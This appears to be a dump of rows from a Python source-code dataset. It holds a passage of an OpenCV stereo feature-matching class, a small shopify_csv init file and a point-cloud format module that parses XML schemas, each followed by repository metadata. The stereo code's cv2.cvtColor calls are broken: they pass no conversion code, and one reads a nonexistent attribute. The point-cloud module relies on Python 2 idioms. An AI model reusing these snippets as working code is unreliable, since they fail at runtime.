:param right_frame (np.array): of size (HxWx3 or HxW) of stereo configuation
:param params (AttriDict): contains parameters for the stereo configuration,
detection of and matching of features computer vision features
"""
self.left_frame = left_frame
self.right_frame = right_frame
self.params = params
def get_matching_keypoints(self):
"""
Runs a feature detector on both the features, computes keypoints and descriptor
information and performs flann based matching to match keypoints across the left
and right frames and applying ratio test to filter "good" matching features
Returns:
matchedPoints (tuple of np.array for (left, right)): each of size (N,2) of matched features
keypoints (tuple of lists for (left, right)) : each list containing metadata of kepoints from feature detector
descriptors (tuple of np.array for (left, right)) : each of size (MXd) list containing feature vector of keypoints from feature detector
"""
if self.params.geometry.detection.method == "SIFT":
detector = cv2.xfeatures2d.SIFT_create()
else:
raise NotImplementedError("Feature Detector has not been implemented. Please refer to the Contributing guide and raise a PR")
if len(self.left_frame.shape) == 3:
self.left_frame = cv2.cvtColor(self.left_frame.left)
if len(self.right_frame.shape) == 3:
self.right_frame = cv2.cvtColor(self.right_frame)
keyPointsLeft, descriptorsLeft = detector.detectAndCompute(self.left_frame, None)
keyPointsRight, descriptorsRight = detector.detectAndCompute(self.right_frame, None)
if self.params.debug.plotting.features:
DetectionEngine.plot_feature(self.left_frame, self.right_frame, keyPointsLeft, keyPointsRight)
args_feature_matcher = self.params.geometry.featureMatcher.configs
indexParams = args_feature_matcher.indexParams
searchParams = args_feature_matcher.searchParams
if self.params.geometry.featureMatcher.method == "FlannMatcher":
matcher = cv2.FlannBasedMatcher(indexParams, searchParams)
else:
raise NotImplementedError("Feature Matcher has not been implemented. Please refer to the Contributing guide and raise a PR")
matches = matcher.knnMatch(descriptorsLeft, descriptorsRight, args_feature_matcher.K)
#Apply ratio test
goodMatches = []
ptsLeft = []
ptsRight = []
for m, n in matches:
if m.distance < args_feature_matcher.maxRatio * n.distance:
goodMatches.append([m])
ptsLeft.append(keyPointsLeft[m.queryIdx].pt)
ptsRight.append(keyPointsRight[m.trainIdx].pt)
ptsLeft = np.array(ptsLeft).astype('float64')
ptsRight = np.array(ptsRight).astype('float64')
if self.params.debug.plotting.featureMatches:
DetectionEngine.plot_feature_matches(self.left_frame, self.right_frame, keyPointsLeft, keyPointsRight, goodMatches)
matchedPoints = ptsLeft, ptsRight
keypoints = keyPointsLeft, keyPointsRight
descriptors = descriptorsLeft, descriptorsRight
return matchedPoints, keypoints, descriptors
@staticmethod
def plot_feature(left_frame, right_frame, keyPointsLeft, keyPointsRight):
"""
Helper function for plotting features on respective left and right frames
usign keypoint computed from feature detector
"""
kp_on_left_frame = cv2.drawKeypoints(left_frame,
keyPointsLeft,
None)
kp_on_right_frame = cv2.drawKeypoints(right_frame,
keyPointsRight,
None)
plt.figure(figsize=(30, 15))
plt.subplot(1, 2, 1)
plt.imshow(kp_on_left_frame)
plt.subplot(1, 2, 2)
plt.imshow(kp_on_right_frame)
plt.show()
@staticmethod
def plot_feature_matches(left_frame, right_frame, keyPointsLeft, keyPointsRight, matches):
"""
Helper function for plotting feature matches across the left and right frames
using keypoint calculated from the feature detector and matches from the featue matcher
"""
feature_matches = cv2.drawMatchesKnn(left_frame,
keyPointsLeft,
right_frame,
keyPointsRight,
matches,
outImg=None,
flags=0)
plt.figure(figsize=(20, 10))
plt.imshow(feature_matches)
plt.show()
| 40.036496 | 149 | 0.615497 | 5,389 | 0.982498 | 0 | 0 | 1,615 | 0.294439 | 0 | 0 | 1,828 | 0.333273 |
7b72e8377f711b1cb1ee17fd39204a3883465200 | 78 | py | Python | shopify_csv/__init__.py | d-e-h-i-o/shopify_csv | 0c49666bca38802a756502f72f835abb63115025 | [
"MIT"
]
| 1 | 2021-02-28T11:36:50.000Z | 2021-02-28T11:36:50.000Z | shopify_csv/__init__.py | d-e-h-i-o/shopify_csv | 0c49666bca38802a756502f72f835abb63115025 | [
"MIT"
]
| null | null | null | shopify_csv/__init__.py | d-e-h-i-o/shopify_csv | 0c49666bca38802a756502f72f835abb63115025 | [
"MIT"
]
| null | null | null | from .constants import FIELDS, PROPERTIES
from .shopify_csv import ShopifyRow
| 26 | 41 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b745432625aa3fd9106d5e8fec7445b66115435 | 8,070 | py | Python | pgpointcloud_utils/pcformat.py | dustymugs/pgpointcloud_utils | 24193438982a8070a0aada34fca4db62688d18ba | [
"BSD-3-Clause"
]
| 1 | 2016-09-04T20:44:15.000Z | 2016-09-04T20:44:15.000Z | pgpointcloud_utils/pcformat.py | dustymugs/pgpointcloud_utils | 24193438982a8070a0aada34fca4db62688d18ba | [
"BSD-3-Clause"
]
| 6 | 2015-02-19T10:27:39.000Z | 2015-02-19T10:58:49.000Z | pgpointcloud_utils/pcformat.py | dustymugs/pgpointcloud_utils | 24193438982a8070a0aada34fca4db62688d18ba | [
"BSD-3-Clause"
]
| null | null | null | from decimal import Decimal
import xml.etree.ElementTree as ET
from .pcexception import *
class PcDimension(object):
DEFAULT_SCALE = 1.
BYTE_1 = 1
BYTE_2 = 2
BYTE_4 = 4
BYTE_8 = 8
BYTES = [BYTE_1, BYTE_2, BYTE_4, BYTE_8]
INTERPRETATION_MAPPING = {
'unknown': {},
'int8_t': {
'size': BYTE_1,
'struct': 'b'
},
'uint8_t': {
'size': BYTE_1,
'struct': 'B'
},
'int16_t': {
'size': BYTE_2,
'struct': 'h'
},
'uint16_t': {
'size': BYTE_2,
'struct': 'H'
},
'int32_t': {
'size': BYTE_4,
'struct': 'i'
},
'uint32_t': {
'size': BYTE_4,
'struct': 'I'
},
'int64_t': {
'size': BYTE_8,
'struct': 'q'
},
'uint64_t': {
'size': BYTE_8,
'struct': 'Q'
},
'float': {
'size': BYTE_4,
'struct': 'f'
},
'double': {
'size': BYTE_8,
'struct': 'd'
},
}
INTERPRETATION = INTERPRETATION_MAPPING.keys()
def __init__(
self,
name=None, size=None, interpretation=None, scale=None
):
self._name = None
self._size = None
self._interpretation = None
self._scale = PcDimension.DEFAULT_SCALE
if name is not None:
self.name = name
if size is not None:
self.size = size
if interpretation is not None:
self.interpretation = interpretation
if scale is not None:
self.scale = scale
@property
def name(self):
return self._name
@name.setter
def name(self, new_value):
try:
new_value = str(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as a string'
)
self._name = new_value
@property
def size(self):
return self._size
@size.setter
def size(self, new_value):
try:
new_value = int(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an integer'
)
if new_value not in PcDimension.BYTES:
raise PcInvalidArgException(
message='Invalid size provided'
)
self._size = new_value
@property
def interpretation(self):
return self._interpretation
@interpretation.setter
def interpretation(self, new_value):
if new_value not in PcDimension.INTERPRETATION:
raise PcInvalidArgException(
message='Invalid interpretation provided'
)
self._interpretation = new_value
@property
def scale(self):
return self._scale
@scale.setter
def scale(self, new_value):
try:
new_value = float(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an float'
)
# scale cannot be zero
if Decimal(new_value) == Decimal(0.):
raise PcInvalidArgException(
message='Value cannot be zero'
)
self._scale = new_value
@property
def struct_format(self):
if self.interpretation is None:
return None
return PcDimension.INTERPRETATION_MAPPING[self.interpretation].get(
'struct', None
)
class PcFormat(object):
def __init__(self, pcid=None, srid=None, proj4text=None, dimensions=None):
self._pcid = None
self._srid = None
self._proj4text = None
self._dimensions = []
self._dimension_lookup = {}
if pcid:
self.pcid = pcid
if srid:
self.srid = srid
if dimensions:
self.dimensions = dimensions
@property
def pcid(self):
return self._pcid
@pcid.setter
def pcid(self, new_value):
try:
new_value = int(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an integer'
)
self._pcid = new_value
@property
def srid(self):
return self._srid
@srid.setter
def srid(self, new_value):
try:
new_value = int(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an integer'
)
self._srid = new_value
@property
def proj4text(self):
return self._proj4text
@proj4text.setter
def proj4text(self, new_value):
try:
new_value = str(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as a string'
)
self._proj4text = new_value
@property
def dimensions(self):
return self._dimensions
@dimensions.setter
def dimensions(self, new_value):
if not isinstance(new_value, list):
raise PcInvalidArgException(
message='Value not a list'
)
for dim in new_value:
if not isinstance(dim, PcDimension):
raise PcInvalidArgException(
message='Element of list not instance of PcDimension'
)
self._dimensions = new_value
# build lookups
self._build_dimension_lookups()
def _build_dimension_lookups(self):
self._dimension_lookups = {
'name': {}
}
for dim in self._dimensions:
self._dimension_lookups['name'][dim.name] = dim
@classmethod
def import_format(cls, pcid, srid, schema):
'''
helper function to import record from pgpointcloud_formats table
'''
frmt = cls(pcid=pcid, srid=srid)
namespaces = {
'pc': 'http://pointcloud.org/schemas/PC/1.1'
}
root = ET.fromstring(schema)
# first pass, build dict of dimensions
dimensions = {}
for dim in root.findall('pc:dimension', namespaces):
index = int(dim.find('pc:position', namespaces).text) - 1
size = dim.find('pc:size', namespaces).text
name = dim.find('pc:name', namespaces).text
interpretation = dim.find('pc:interpretation', namespaces).text
scale = dim.find('pc:scale', namespaces)
if scale is not None:
scale = scale.text
dimensions[index] = PcDimension(
name=name,
size=size,
interpretation=interpretation,
scale=scale
)
# second pass, convert dict to list for guaranteed order
_dimensions = [None] * len(dimensions)
for index, dimension in dimensions.iteritems():
_dimensions[index] = dimension
frmt.dimensions = _dimensions
return frmt
@property
def struct_format(self):
frmt = []
num_dimensions = len(self.dimensions)
for index in xrange(num_dimensions):
frmt.append(
self.dimensions[index].struct_format
)
frmt = ' '.join(frmt)
return frmt
def get_dimension(self, name_or_pos):
'''
return the dimension by name or position (1-based)
'''
if isinstance(name_or_pos, int):
# position is 1-based
return self.dimensions[name_or_pos - 1]
else:
return self._dimension_lookups['name'][name_or_pos]
def get_dimension_index(self, name):
'''
return the index of the dimension by name
'''
if name not in self._dimension_lookups['name']:
return None
return self.dimensions.index(self._dimension_lookups['name'][name])
| 24.603659 | 78 | 0.53482 | 7,975 | 0.988228 | 0 | 0 | 5,002 | 0.619827 | 0 | 0 | 1,173 | 0.145353 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.